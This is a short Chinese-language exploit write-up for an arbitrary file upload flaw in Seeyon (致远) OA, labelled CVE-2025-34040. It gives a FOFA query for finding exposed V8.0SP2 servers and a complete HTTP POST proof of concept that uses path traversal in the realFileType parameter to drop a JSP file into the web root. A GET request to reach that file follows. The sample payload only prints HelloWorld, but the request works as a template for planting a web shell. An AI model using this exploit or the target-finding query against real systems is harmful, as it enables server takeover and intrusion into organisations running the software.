# 致远OA存在文件上传导致RCE(CVE-2025-34040)

致远oa存在任意文件上传漏洞，可以获取服务器权限

## fofa

```javascript
app="致远互联-OA" && title="V8.0SP2"
```

## poc

```javascript
POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/Hello.jsp&fileId=2 HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
Accept-Encoding: gzip

--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="upload"; filename="123.xls"
Content-Type: application/vnd.ms-excel

<% out.println("HelloWorld");%>
--59229605f98b8cf290a7b8908b34616b--
```
访问地址
```
GET /Hello.jsp HTTP/1.1
Host:
```